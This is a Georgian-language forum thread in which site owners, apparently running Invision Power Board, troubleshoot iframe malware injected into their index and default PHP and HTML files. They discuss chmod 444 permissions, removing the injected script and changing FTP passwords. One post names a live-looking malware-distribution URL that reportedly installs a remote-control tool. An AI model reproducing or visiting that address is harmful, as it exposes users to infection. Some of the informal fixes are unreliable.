იდეაში index.php-ს არაფერშI არ სჭირდება 777 ან 775 და 644 ერთხელ ატვირთულია და მორჩა ჩაწერით შიგნით არაფერი იწერება.

ზოგიერთს აქვს საქაღალდეებში ჩაყრილი ცარიელი INDEX.HTML ფაილები, ესენიც ასევე საიცავით (გამოიყენება მაგალითად მაშინ როდესაც სერვერზე ჩართულია ბროუსინგი და თქვენ არ გინდათ კლიენტს დაანახოთ შემთხვევით შემოსვლისას საქაღალდის კონტენტი).

[K.C.]

Power_VANO

რატომ და (IMG:style_emoticons/default/smile.gif) გახსენი აბა კრაკი შენთან (IMG:style_emoticons/default/smile.gif)
საწყის გვერდად ჩემთან index.php კი არაა (IMG:style_emoticons/default/smile.gif) index.html არის (IMG:style_emoticons/default/smile.gif) შემდეგ გადადიხარ ფორუმის ინდექსე ნუ ეგ ორივე ფაილი ერთად გვერდიგვერდ დევს (IMG:style_emoticons/default/smile.gif) ანუ პჩპ_იც და ჩთმლ_იც ზუსტად მაგიტომაც ჩავტენე იქ (IMG:style_emoticons/default/smile.gif)

ხალხნო გუგლი კიარა რამბლერ.რუს დედა მოვტყ......

კარგად წაიკითხე რამბლერი მანდ არაფერ შუაში არაა (IMG:style_emoticons/default/smile.gif) რამბლერის მრიცხველი გედო სავარაუდოდ რაც სეეხება ვირუსს ისაა

http://xanjan.cn/tds/in.cgi?4

რომელიც შესვლისას გიინსტალებს ან ცდილობს დაგიინსტალოს ადონი რემოტე კონტროლის (IMG:style_emoticons/default/smile.gif)

მაგრამ

შენ ზემოთა სურათში წერია რო ვერ ახერხებს ფაილში გაწერას რაც ფუი ეშმაკს და 755 მაინც უნდა ჩმოდ, დალშე რაც შეეხება

ესე ვქენი წინა ფორუმზეც უბრალოდ მერე CHMOD 444-ზე არ გადამიყვანია ის ფაილი და შემდეგ სხვა ფაილებიც დაინფიცირდნენ და გამიფუჭდა ფორუმი.

ეგ პრობლემა აწუხებს ძირითადად მაივებს და რატომღაც იქ ყველა ფაილში ეტენება (საოცარია მაგრამ ფაქტია)

თუმცა მე რამდენადაც ვხვდები არ მოედება მთლიანად როცა დროულად უშველი, რამდენად გაჭრის არ ვიცი (IMG:style_emoticons/default/biggrin.gif)
ალბათ მოგიწევს ან თავიდან დააინსტალო შენი ფორუმი ან, გახსნა ყველა სკრიპტი ცოოოოტა ძნელია, და ამოშალო თუმცა მე მქონდა შეხება ერთ საიტის სკრიპტთან და იქ მთლიანი შიგთავსი ამოჭამა (IMG:style_emoticons/default/blink.gif) და მხოლოდ ეგ ჯანდაბა სკრიპტი იყო ამიტომ არ ვიცი შენთან როგორ იქნება (IMG:style_emoticons/default/mellow.gif)

[suckers]

K.C.
default.php - ში ბოლოში იყო ეგ სკრიპტი და წავშალე და ახალი ჩავაგდე და CHMOD გავუკეთე 444 .

[K.C.]

ja_ja

სალამი.

1. ასე თუ ისე ტყდება FTP პაროლი და მერე ახსნა საჭირო აღარაა, გატეხვის იოლი მეთოდია თვითონ ადმინ პანელი.
2. იგივე ადმინ პანელის მეშვეობით თრეულობენ შესაბამისი იუზერის უფლებას და სკრიპტებით ემატება ყველაზე გავრცელებულ ფაილებში (კერძოდ index.php, index.htm და ასე შედმეგ) შემტებვის კოდი.
3. შესაძლოა ამა თი ინ დვიჟოკების გარკვეული შეცდომის გამო თვითონ დვიჟოკს აიძულო ჩაამატოს საჭირო ტექსტი შესაბამის ფაილებში.

ამ სამი ვარიანტიდან უკაცრავად და 1 და 2 გამოვრიცხავ პირდაპირ (IMG:style_emoticons/default/smile.gif) რაც შეეხება 3. გააჩნია დვიჟოკში რას იგულისხმებ ლინუქსს ანუ ოსს თუ IPB_ს.

1. ცვალეთ FTP-ს პაროლები
2. მისდიეთ სკრიპტების აბდეიტებს
ეს ორივე არის სტანდარტული ქაჯობა, ისეთი პონტია რა თავიდან გიცილებს ყველა, აგერ განაახლე და ვსიო.

1. რაღაც მეეჭვება ვინმემ ფტპ პაროლი გამიტეხოს და მეტი არაფერი ქნას, მითუმეტეს როცა ჩემი ფტპ პაროლი შედგება როგორც ქართული ასე ლათინური სიმბოლოებისაგან და ციფრებისაგან (IMG:style_emoticons/default/smile.gif) და საბოლოო ჯამში ცდება 35 ის რაოდენობას ზუსტს არ დავასახელებ (IMG:style_emoticons/default/biggrin.gif)

2. სკრიპტის აპდეიტს რაც შეეხება მაგასთან მაქვს მე თითონ პრობლემა და თან არც სურვილი მაქვს ეხლანდელი IPB ვერსია რაიმე სახით დავააპდეიტო (IMG:style_emoticons/default/smile.gif) რიგ მიზეზთა გამო.

სამაგიეროდ წყნარად ხარ, საჭიროა რაიმეს ჩამატება შენს ლოკალურ სერვერზე აკეტეს ცვლილებას, და მერე იმის ატვირთავს ვახდეს, ისევ CHMOD 444 და ასე შემდეგ.

ინდექსს რო არ ჭირდება გავერკვიე მაგაში უკვე მაგრამ page_default.php ს ასე თუ ისე ჭირდება ჩემთან იმიტო რო მასში ბევრი ჯანდაბა ხდება ხოლმე (IMG:style_emoticons/default/biggrin.gif) და მაგას რო 444 მივეცი საერთოდ გამომერთო ერთ ერთი მოდული.

ასევე დავძენ რო ჯერ ჯერობით ჩემთან სიწყნარეა თუ იქნება რაიმე სახის კიდე დავირუსება აღვნიშნავ. (ჯერ ველოდები გუგლის ანალიტიკის ამოღების მერე რა მოხდება, აგერ უკვე მერამდენე დღეა)

[ja_ja]

K.C.

გააჩნია დვიჟოკში რას იგულისხმებ ლინუქსს ანუ ოსს თუ IPB_ს.

რა თქმა უნდა საიტის დვიჟოკს ვგულისხმობ და არა Linux-ს, თუმცა გარკვეულ შემთხვევაში შესაძლებელია Linux-ის root-ის პაროლების დათრევაც. (ამ ჩვენს სერვერზე მაგის არაერთი მცდელობა იყო ბოლო 5 თვის განმავლობაში. ჯერჯერობით ვუძლებთ შექმნილი დაცვით, მერე რა იქნება ვერ გეტყვი)

რა დონის სკრიპტებს წერს ხალხი შენ არც იცი. ზოგჯერ მიკვირს ხოლმე, ნუთუ ამის გაკეთება უბრალო PHP-ით შეიძლება (IMG:style_emoticons/default/smile.gif) , სამწუხაროა რომ ეგეთი სკრიპტების უმეტესობა უცხოურია, ქართველებს ჯერჯერობით ფანტაზია და ცოდნა არ ყოფნით.

რაც შეეხება 444-ს და page_default.php ნუ რა გითხრა, სანამ გაუძლებ 444-ის გარეშე ჰო კაი, მარა ძირითადად ეგეთი ტიპის ინსაიდერები გათვლილია ხრსირად გამოყენებად ფაიელბზე, მაგალითად:
index.php
index.*
default.*
mail.*
admin.*
და ასე შემდეგ.

ასე რომ ფრთხილად იყავი.

[K.C.]

ja_ja

რჩევას რა თქმა უნდა გავითვალისწინებ (IMG:style_emoticons/default/smile.gif)

რა დონის სკრიპტებს წერს ხალხი შენ არც იცი. ზოგჯერ მიკვირს ხოლმე, ნუთუ ამის გაკეთება უბრალო PHP-ით შეიძლება smile.gif, სამწუხაროა რომ ეგეთი სკრიპტების უმეტესობა უცხოურია, ქართველებს ჯერჯერობით ფანტაზია და ცოდნა არ ყოფნით.

რა იგულისხმე ამაში ექსპლოიტები თუ საიტის ძრავი ანუ ინვიზიონ პოვერ ბოარდი?? (IMG:style_emoticons/default/smile.gif)

რაც შეეხება 444-ს და page_default.php ნუ რა გითხრა, სანამ გაუძლებ 444-ის გარეშე ჰო კაი, მარა ძირითადად ეგეთი ტიპის ინსაიდერები გათვლილია ხრსირად გამოყენებად ფაიელბზე, მაგალითად: index.php index.* default.* mail.* admin.* და ასე შემდეგ.

ნუ ვნახოთ რაიმე გამოსავალი რო საპოვნი მაქვს ფაქტია მაგრამ რავიცი ვნახოთ ეგეც როგორ წავა საქმე (IMG:style_emoticons/default/smile.gif)
admin.php ფტპ ზე საერთოდ ისეთი პერმისიონებით მაქვს რო ფუი ეშმაკს მეც ძლივს ვნახულობ საიტის სერვერის დვიჟოკიდან. (IMG:style_emoticons/default/biggrin.gif)
ნუ აი ის page_default.php მადარდებს თუ 444 ზე მიდგა საქმე თორე ინდექსებს კაი მივაჩმოდავ (IMG:style_emoticons/default/biggrin.gif)

ნუ რამდენად არასანდო შეიძლება იყოს IPB მაგაზე საუბარი ძალიან გაგვიგრძელდება.

როგორც იტყვიან ველოდებით გაგრძელებას (IMG:style_emoticons/default/huh.gif)

[chiora]

IPB-ს ყველა საქაღალდეში აღმოჩნდა ასეთი ვირუსი: HTML/Iframe.B.Gen virus როგორ გავწმინოდო? საქმე იმაშია რომ რამდენიმე თვის დარეზერვებულ ფაილებსაც აღმოაჩნდა...

აუ არ დამცინოთ, აქ რომ ვწერ მერე ვხვდები რაშიცაა პრობლემა..., მაგრამ ერთი რამ მაინც ვერ გავარკვიე. პრობლემა იყო ცარიელ index.html ფაილში, მაგას ვირუსად აღიქვამდა, ამას კი წავშლი მაგრამ მანამდე რა დატვირთვა ქონდა ამ ფაილს საერთოდ??? რა საჭიროა ვერ გავიგე. ისე რას უნდა გამოწვია ნეტა... (IMG:style_emoticons/default/huh.gif)

[chiora]

ja_ja

რაც შეეხება 444-ს და page_default.php ნუ რა გითხრა, სანამ გაუძლებ 444-ის გარეშე ჰო კაი, მარა ძირითადად ეგეთი ტიპის ინსაიდერები გათვლილია ხრსირად გამოყენებად ფაიელბზე, მაგალითად:
index.php
index.*
default.*
mail.*
admin.*

ეგ მხოლოდ სათავო ფაილებზე დავაყენოდ პერმიშენი 444-ზე თუ ყველა საქაღალდეში არსებულ ინდექს ფაილებს და ა. შ.

[Power_VANO]

chiora
საერთოდ, სჯობს ყველა საქაღალდეში არსებულ ინდექს ფაილებზე მიაყენო ეგ პერმიშენები. ძირითადად ყველა ინდექს ფაილში იწერება ხოლმე ეგ აიფრემ კოდები.

[chiora]

Power_VANO
ძალიან კარგი (IMG:style_emoticons/default/wink.gif) გაიხარე